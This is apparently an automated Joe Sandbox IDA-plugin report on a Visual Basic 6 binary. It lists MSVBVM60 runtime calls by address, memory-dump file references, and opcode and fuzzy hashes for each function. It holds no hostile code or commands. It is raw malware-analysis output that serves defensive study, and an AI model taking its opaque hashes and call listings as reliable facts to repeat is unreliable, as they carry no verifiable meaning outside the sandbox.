                                                            • Part of subcall function 0042ECB0: __vbaOnError.MSVBVM60(000000FF,6D42D8B1,?,6D41A323,00000000,004030D6), ref: 0042EE6E
                                                            • Part of subcall function 0042ECB0: __vbaVarVargNofree.MSVBVM60 ref: 0042EE8F
                                                            • Part of subcall function 0042ECB0: __vbaVarSub.MSVBVM60(?,00000002,00000000), ref: 0042EE9E
                                                            • Part of subcall function 0042ECB0: __vbaI2Var.MSVBVM60(00000000), ref: 0042EEA5
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF2B
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF4E
                                                            • Part of subcall function 0042ECB0: __vbaVarIndexLoad.MSVBVM60(?,?,00000001), ref: 0042EF76
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF86
                                                            • Part of subcall function 0042ECB0: __vbaVarIndexStore.MSVBVM60(00000000,00000001), ref: 0042EFA9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$ErrorFreeUbound$Chkstk$DestructSystem$IndexMoveRedim$#644#717CopyLoadNofreeOverflowStoreVarg
                                                          • String ID: ($@
                                                          • API String ID: 161593248-1311469180
                                                          • Opcode ID: 81ed0f519873673574c8bc33aec983e2e7658764fa2c227225f3d605abdfaf78
                                                          • Instruction ID: a79e5abe41e453aa90ba99eeb10c5bb06b5eb38d77dcd0a54a6dbfc7723e8c11
                                                          • Opcode Fuzzy Hash: 81ed0f519873673574c8bc33aec983e2e7658764fa2c227225f3d605abdfaf78
                                                          • Instruction Fuzzy Hash: FA611BB1D01218AFDB04DFE4DD85EEEBBB9EF48700F10811AF505BA294D6B56A44CFA4
                                                          APIs
                                                          • __vbaLenBstr.MSVBVM60(00000000,00402700,00000000,6D42D8B1), ref: 0042EAC9
                                                          • __vbaLenBstr.MSVBVM60 ref: 0042EAD7
                                                          • _adj_fdiv_m64.MSVBVM60 ref: 0042EB02
                                                          • __vbaFpI4.MSVBVM60 ref: 0042EB11
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000), ref: 0042EB31
                                                          • __vbaUbound.MSVBVM60(00000001,?), ref: 0042EB40
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042EB80
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042EB88
                                                          • #631.MSVBVM60(?,?,?,0040A4B0), ref: 0042EBB4
                                                          • __vbaStrMove.MSVBVM60 ref: 0042EBBF
                                                          • __vbaStrCat.MSVBVM60(00000000), ref: 0042EBC2
                                                          • __vbaStrMove.MSVBVM60 ref: 0042EBCD
                                                          • #581.MSVBVM60(00000000), ref: 0042EBD0
                                                          • __vbaFpUI1.MSVBVM60 ref: 0042EBD6
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0042EBEF
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042EBFB
                                                          • __vbaAryCopy.MSVBVM60(?,?), ref: 0042EC1F
                                                          • __vbaAryCopy.MSVBVM60(?,?), ref: 0042EC35
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0042EC89), ref: 0042EC7E
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042EC86
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$BoundsBstrCopyDestructErrorFreeGenerateMove$#581#631ListRedimUbound_adj_fdiv_m64
                                                          • String ID:
                                                          • API String ID: 796740024-0
                                                          • Opcode ID: 926c2a64c744023e314f35efbd6e670d23ae845769974af15881788388fed48a
                                                          • Instruction ID: 711d211df41d8dde8c61da5d577fc3e3e83583ecd5aa9ed7bebc3896d50b31f3
                                                          • Opcode Fuzzy Hash: 926c2a64c744023e314f35efbd6e670d23ae845769974af15881788388fed48a
                                                          • Instruction Fuzzy Hash: 92517F70E00218EFDB04DFE6EE89AAEBBB9FB48701F50812AE505B7260D7745841CF59
                                                          APIs
                                                            • Part of subcall function 00432090: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004320ED
                                                            • Part of subcall function 00432090: #632.MSVBVM60(?,?,00000000,?,?,?,00000000), ref: 00432131
                                                            • Part of subcall function 00432090: __vbaVarMove.MSVBVM60(?,?,00000000), ref: 00432140
                                                            • Part of subcall function 00432090: __vbaFreeVar.MSVBVM60(?,?,00000000), ref: 00432149
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(00004008,?,?,?,00000000), ref: 00432169
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 00432189
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(00004008,?,?,?,?,00000000), ref: 004321A9
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 004321C9
                                                            • Part of subcall function 00432090: __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 004321E9
                                                          • __vbaLenBstr.MSVBVM60(?,?,?,6D42D8B1,?,?), ref: 004314F8
                                                          • #632.MSVBVM60(?,?,?,?,?,?,?,6D42D8B1,?,?), ref: 00431539
                                                          • __vbaStrVarMove.MSVBVM60(?,?,?,?,6D42D8B1,?,?), ref: 00431543
                                                          • __vbaStrMove.MSVBVM60(?,?,?,6D42D8B1,?,?), ref: 0043154E
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,?,6D42D8B1,?,?), ref: 0043155A
                                                          • __vbaInStr.MSVBVM60(00000000,?,+-0123456789.eE,00000001,6D42D8B1,?,?), ref: 00431570
                                                          • __vbaStrCat.MSVBVM60(?,?), ref: 00431582
                                                          • __vbaStrMove.MSVBVM60 ref: 0043158D
                                                          • #564.MSVBVM60(00004008,00000002), ref: 004315B9
                                                          • __vbaHresultCheck.MSVBVM60(00000000), ref: 004315C4
                                                          • __vbaVarMove.MSVBVM60 ref: 004315D0
                                                          • __vbaFreeStr.MSVBVM60(00431611,?,?,?,6D42D8B1,?,?), ref: 00431609
                                                          • __vbaFreeStr.MSVBVM60(?,?,?,6D42D8B1,?,?), ref: 0043160E
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 00431640
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Move$Free$#632Bstr$#564CheckErrorHresultListOverflow
                                                          • String ID: +-0123456789.eE
                                                          • API String ID: 654446260-3706364263
                                                          • Opcode ID: 5dd43ac8149da61bd8ee625107cdf0468f812e9e938102ad8eca6366f64d02fa
                                                          • Instruction ID: 9136322a2119d5f1aacdf805f51ea8f6c0e77b3e43a1c18da83211084d42bebf
                                                          • Opcode Fuzzy Hash: 5dd43ac8149da61bd8ee625107cdf0468f812e9e938102ad8eca6366f64d02fa
                                                          • Instruction Fuzzy Hash: CF413CB1D00209AFCB04DFA5D985AEEBBB8FF48704F00812AE516B7264EB746945CF64
                                                          APIs
                                                          • #644.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,004030D6), ref: 0041B733
                                                          • __vbaLenBstr.MSVBVM60(?,00000000,00000000,00000000,00000000), ref: 0041B742
                                                          • __vbaSetSystemError.MSVBVM60(0000FDE9,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0041B758
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,-00000001,00000000,?,00000000,00000000,00000000,00000000), ref: 0041B784
                                                          • #644.MSVBVM60(00000000), ref: 0041B790
                                                          • __vbaAryLock.MSVBVM60(?,?), ref: 0041B79C
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041B7BB
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041B7C8
                                                          • __vbaLenBstr.MSVBVM60(?,00000000,?,00000000,00000000), ref: 0041B7E2
                                                          • __vbaSetSystemError.MSVBVM60(0000FDE9,00000000,00000000,00000000), ref: 0041B7F6
                                                          • __vbaAryUnlock.MSVBVM60(?), ref: 0041B800
                                                          • __vbaStr2Vec.MSVBVM60(?,00000000,?,00000000,00000000,00000000,00000000), ref: 0041B80C
                                                          • __vbaAryMove.MSVBVM60(?,?,?,00000000,00000000,00000000,00000000), ref: 0041B81A
                                                          • __vbaAryMove.MSVBVM60(?,?,?,00000000,00000000,00000000,00000000), ref: 0041B828
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0041B86B,?,00000000,00000000,00000000,00000000), ref: 0041B864
                                                          • __vbaErrorOverflow.MSVBVM60(00000000,?,00000000,00000000,00000000,00000000), ref: 0041B881
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Error$#644BoundsBstrGenerateMoveSystem$DestructLockOverflowRedimStr2Unlock
                                                          • String ID:
                                                          • API String ID: 2297530715-0
                                                          • Opcode ID: 03c2d34c5da55568346e7be3cdbf5c606209067d442dd6e03cb1af6a6e142cc3
                                                          • Instruction ID: facbf0fad52eaf156f210e650c605653535b5a0f73e6edb35c62a4a7f24c37b0
                                                          • Opcode Fuzzy Hash: 03c2d34c5da55568346e7be3cdbf5c606209067d442dd6e03cb1af6a6e142cc3
                                                          • Instruction Fuzzy Hash: 49413074A00205AFDB14EFA4CD89FEE7BB8EB48B01F10451AF505B7290D774A881CBA8
                                                          APIs
                                                          • __vbaStrCopy.MSVBVM60(6D42D8B1,00000000,00000000), ref: 0042E902
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042E941
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042E94B
                                                          • __vbaStrUI1.MSVBVM60(?), ref: 0042E95A
                                                          • __vbaStrMove.MSVBVM60 ref: 0042E965
                                                          • __vbaStrCmp.MSVBVM60(0040796C,00000000), ref: 0042E96D
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042E980
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042E9B7
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0042E9C1
                                                          • #608.MSVBVM60(?,00000000), ref: 0042E9D6
                                                          • __vbaVarAdd.MSVBVM60(?,?,00000008), ref: 0042E9E8
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0042E9EF
                                                          • __vbaStrMove.MSVBVM60 ref: 0042E9FA
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042EA06
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$BoundsErrorGenerate$Move$Free$#608CopyList
                                                          • String ID:
                                                          • API String ID: 1868846481-0
                                                          • Opcode ID: 689ad2581e68a65f5267189d5a3a514159f27da0af016da24bbe7ed23ad52d35
                                                          • Instruction ID: e8d1230953c0cc7c8dbdaf5d51543e40696701a6c72430354490b54089ba4e84
                                                          • Opcode Fuzzy Hash: 689ad2581e68a65f5267189d5a3a514159f27da0af016da24bbe7ed23ad52d35
                                                          • Instruction Fuzzy Hash: 4D4151B9E00129DFCB04DFA5D988AAEBB75FF48700F50816BE802B7350DB749841CB98
                                                          APIs
                                                          • __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004320ED
                                                          • #632.MSVBVM60(?,?,00000000,?,?,?,00000000), ref: 00432131
                                                          • __vbaVarMove.MSVBVM60(?,?,00000000), ref: 00432140
                                                          • __vbaFreeVar.MSVBVM60(?,?,00000000), ref: 00432149
                                                          • __vbaVarTstEq.MSVBVM60(00004008,?,?,?,00000000), ref: 00432169
                                                          • __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 00432189
                                                          • __vbaVarTstEq.MSVBVM60(00004008,?,?,?,?,00000000), ref: 004321A9
                                                          • __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 004321C9
                                                          • __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 004321E9
                                                          • __vbaVarTstEq.MSVBVM60(?,?,?,?,?,00000000), ref: 00432209
                                                          • __vbaVarTstEq.MSVBVM60(00004008,?,?,?,?,00000000), ref: 00432229
                                                          • __vbaFreeVar.MSVBVM60(004322E3,?,?,00000000), ref: 004322DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Free$#632BstrMove
                                                          • String ID:
                                                          • API String ID: 563547971-0
                                                          • Opcode ID: d69d7a7ed1c3e84b224e5c63cf746238737397c264c58c835669f275f8c669d4
                                                          • Instruction ID: f1d9c2993b85f621a844e2641b01aea619df5574dee56f8286fa71eb6718e8b7
                                                          • Opcode Fuzzy Hash: d69d7a7ed1c3e84b224e5c63cf746238737397c264c58c835669f275f8c669d4
                                                          • Instruction Fuzzy Hash: E8611CB1C0024ADEDF10DF95C944AEEBBB4FF48304F50C16AD415B7294DBB81A468FA9
                                                          APIs
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 004323BD
                                                          • __vbaI2I4.MSVBVM60 ref: 004323CE
                                                          • __vbaI2I4.MSVBVM60 ref: 004323DD
                                                          • __vbaGenerateBoundsError.MSVBVM60(?,00000002), ref: 00432415
                                                          • __vbaGenerateBoundsError.MSVBVM60 ref: 0043241D
                                                          • #631.MSVBVM60(?,?,00000002), ref: 00432440
                                                          • __vbaStrMove.MSVBVM60(?,00000002), ref: 0043244B
                                                          • #516.MSVBVM60(00000000,?,00000002), ref: 00432452
                                                          • __vbaUI1I2.MSVBVM60(?,00000002), ref: 0043245A
                                                          • __vbaFreeStr.MSVBVM60(?,00000002), ref: 0043246C
                                                          • __vbaFreeVar.MSVBVM60(?,00000002), ref: 00432475
                                                          • __vbaAryMove.MSVBVM60(?,?), ref: 00432494
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,004324D3), ref: 004324CC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$BoundsErrorFreeGenerateMove$#516#631DestructRedim
                                                          • String ID:
                                                          • API String ID: 1468883768-0
                                                          • Opcode ID: 8e631f4d0dfd48e904851e7128d924d225c8803be3d1f2a2066d7ef3ec56608a
                                                          • Instruction ID: f059d1d64a4caf2315785085d9bb5da2f47f52e9a2ff60e3cdf4ce9db25721f7
                                                          • Opcode Fuzzy Hash: 8e631f4d0dfd48e904851e7128d924d225c8803be3d1f2a2066d7ef3ec56608a
                                                          • Instruction Fuzzy Hash: BC418275900204DFDB14DF64DA49AEEBBB9FF9C700F10412AE901B7260D7B89884CB64
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,004030D6,?,?,00000000,?,?,004030D6), ref: 0042CCEE
                                                          • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,?,004030D6), ref: 0042CD1E
                                                          • #645.MSVBVM60(00004008,00000000), ref: 0042CD3E
                                                          • __vbaStrMove.MSVBVM60 ref: 0042CD49
                                                          • __vbaLenBstrB.MSVBVM60(00000000), ref: 0042CD50
                                                          • __vbaFreeStr.MSVBVM60 ref: 0042CD66
                                                          • #648.MSVBVM60(0000000A), ref: 0042CD91
                                                          • __vbaFreeVar.MSVBVM60 ref: 0042CD9E
                                                          • __vbaFileOpen.MSVBVM60(00000020,000000FF,?,00000000), ref: 0042CDBA
                                                          • #570.MSVBVM60(?), ref: 0042CDCC
                                                          • #525.MSVBVM60(00000000), ref: 0042CDD3
                                                          • __vbaStrMove.MSVBVM60 ref: 0042CDDE
                                                          • __vbaGet3.MSVBVM60(00000000,00000000,?), ref: 0042CDF6
                                                          • __vbaFileClose.MSVBVM60(?), ref: 0042CE08
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$FileFreeMove$#525#570#645#648BstrChkstkCloseErrorGet3Open
                                                          • String ID:
                                                          • API String ID: 3431710322-0
                                                          • Opcode ID: efe28cf266f4779aa3e85c190e8a90b86f89e250f0c2b8fe7fa525470041b901
                                                          • Instruction ID: 1c0b31d22bf311f8ef879f7298e23bed5ff023f840c9435f0fcc43c9604807dd
                                                          • Opcode Fuzzy Hash: efe28cf266f4779aa3e85c190e8a90b86f89e250f0c2b8fe7fa525470041b901
                                                          • Instruction Fuzzy Hash: 7E310DB5901208EBDB04DFE4DA48BDEBBB8FF08705F108169F511B72A0DB795A44CB69
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042A15E
                                                          • __vbaOnError.MSVBVM60(000000FF,00000000,-00000001,6D4245C1,00000000,004030D6), ref: 0042A18E
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0042A1C7
                                                          • __vbaRedim.MSVBVM60(00000080,00000001,0043D0A0,00000011,00000001,00000000,00000000), ref: 0042A248
                                                          • __vbaAryMove.MSVBVM60(?,?,00006011,0043D094,00006011,?,00004002), ref: 0042A30A
                                                          • __vbaAryMove.MSVBVM60(0043D0A0,?,?,?,?), ref: 0042A3FA
                                                          • __vbaAryMove.MSVBVM60(?,?,00006011,?,00006011,?,00004002), ref: 0042A508
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?,0042A542), ref: 0042A52F
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0042A53B
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042EE3E
                                                            • Part of subcall function 0042ECB0: __vbaOnError.MSVBVM60(000000FF,6D42D8B1,?,6D41A323,00000000,004030D6), ref: 0042EE6E
                                                            • Part of subcall function 0042ECB0: __vbaVarVargNofree.MSVBVM60 ref: 0042EE8F
                                                            • Part of subcall function 0042ECB0: __vbaVarSub.MSVBVM60(?,00000002,00000000), ref: 0042EE9E
                                                            • Part of subcall function 0042ECB0: __vbaI2Var.MSVBVM60(00000000), ref: 0042EEA5
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF2B
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF4E
                                                            • Part of subcall function 0042ECB0: __vbaVarIndexLoad.MSVBVM60(?,?,00000001), ref: 0042EF76
                                                            • Part of subcall function 0042ECB0: __vbaChkstk.MSVBVM60 ref: 0042EF86
                                                            • Part of subcall function 0042ECB0: __vbaVarIndexStore.MSVBVM60(00000000,00000001), ref: 0042EFA9
                                                          • __vbaErrorOverflow.MSVBVM60(00000000), ref: 0042A558
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$Chkstk$ErrorMove$DestructIndexRedim$LoadNofreeOverflowStoreVarg
                                                          • String ID: #
                                                          • API String ID: 2367531599-1885708031
                                                          • Opcode ID: 649582f2c101eeefb12995c6e77167847e9fd0e8b36fc0774355831990dd8661
                                                          • Instruction ID: 68efb111a1aeaa305ce79928a42c2be9ec804b758d3c92e546238b7b7467a383
                                                          • Opcode Fuzzy Hash: 649582f2c101eeefb12995c6e77167847e9fd0e8b36fc0774355831990dd8661
                                                          • Instruction Fuzzy Hash: BDB118B0D0120CEADB04DFD4EA48BDEBBB4FF08708F508059E6057B294D7B95A89DB59
                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(00000000,004030D6), ref: 0042E78E
                                                          • __vbaOnError.MSVBVM60(000000FF,6D42D8B1,00000000,00000000,00000000,004030D6), ref: 0042E7BE
                                                          • __vbaInStr.MSVBVM60(00000000,0040B44C,?,00000001), ref: 0042E7DA
                                                          • #617.MSVBVM60(?,00004008,-00000001), ref: 0042E819
                                                          • #520.MSVBVM60(?,?), ref: 0042E827
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 0042E831
                                                          • __vbaStrMove.MSVBVM60 ref: 0042E83C
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042E84C
                                                          • __vbaStrCopy.MSVBVM60 ref: 0042E866
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0042E8B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571057684.000000000043D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2571071086.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_AGrsqxaSjd.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __vba$ErrorMove$#520#617ChkstkCopyFreeListOverflow
                                                          • String ID: '@
                                                          • API String ID: 4098594408-1796566023
                                                          • Opcode ID: dc6c3591c04bcd1dd1bec91034e11720fda355bd2d6d0f2a4beab6fd682a8556
                                                          • Instruction ID: a1532009b3451ecea4eb63e4f999da68cff088f55a824ecb4ff241b6cbdba044
                                                          • Opcode Fuzzy Hash: dc6c3591c04bcd1dd1bec91034e11720fda355bd2d6d0f2a4beab6fd682a8556
                                                          • Instruction Fuzzy Hash: 53312F71900249EFDB00DF94DA49BDEBFB8FF04704F108159E505B7290D7796A84CB59
                                                          APIs
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041BE66
                                                            • Part of subcall function 0041C100: __vbaUbound.MSVBVM60(00000001,?,004019D0,-00000001,6D4FEC2C), ref: 0041C17A
                                                            • Part of subcall function 0041C100: __vbaUI1I2.MSVBVM60(?,004019D0,-00000001,6D4FEC2C), ref: 0041C182
                                                            • Part of subcall function 0041C100: __vbaAryCopy.MSVBVM60(?,00401AA8,?,004019D0,-00000001,6D4FEC2C), ref: 0041C190
                                                            • Part of subcall function 0041C100: __vbaFreeVar.MSVBVM60(0041C3EE), ref: 0041C3DA
                                                            • Part of subcall function 0041C100: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C3E2
                                                            • Part of subcall function 0041C100: __vbaFreeVar.MSVBVM60 ref: 0041C3EB
                                                          • __vbaRecAssign.MSVBVM60(004050BC,?,?,?), ref: 0041BE91
                                                          • __vbaAryCopy.MSVBVM60(?,?), ref: 0041BEB3
                                                          • #698.MSVBVM60(?,?), ref: 0041BEE4
                                                          • __vbaVarAdd.MSVBVM60(?,?,00000008), ref: 0041BEFF
                                                          • __vbaStrVarMove.MSVBVM60(00000000), ref: 0041BF06
                                                          • __vbaStrMove.MSVBVM60 ref: 0041BF11
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041BF27
                                                          • __vbaStrVarVal.MSVBVM60(?,?,00405638,00000001,000000FF,00000000), ref: 0041BF6F
                                                          • #712.MSVBVM60(?,00000000), ref: 0041BF7A
                                                          • __vbaStrMove.MSVBVM60 ref: 0041BF85
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041BF91
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?,0041C0D7), ref: 0041BFFE
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C010
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C022
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C034
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C046
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C055
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041C05E
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C06D
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C079
                                                          • __vbaFreeVar.MSVBVM60 ref: 0041C082
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C091
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C0A0
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041C0A9
                                                          • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041C0B5
                                                          • __vbaRecDestruct.MSVBVM60(004050BC,?), ref: 0041C0C4
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041C0D0
                                                          • __vbaErrorOverflow.MSVBVM60 ref: 0041C0ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2571034417.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2571020447.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
